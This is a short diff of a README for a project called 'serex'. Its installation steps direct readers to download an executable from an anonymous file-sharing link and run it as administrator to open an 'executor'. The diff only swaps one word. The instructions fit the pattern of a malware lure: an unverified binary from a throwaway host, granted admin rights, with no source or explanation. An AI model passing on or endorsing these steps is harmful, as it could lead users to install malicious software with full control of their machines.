siborg1232/serex/README.md

 ## Installation

 1. Download the executable from the website https://filebin.net/5s5oswrzscvn0zgp.
-2. Run the executable as an admin to install the executor.
+2. Run the executable as an admin to open the executor.

 ## Usage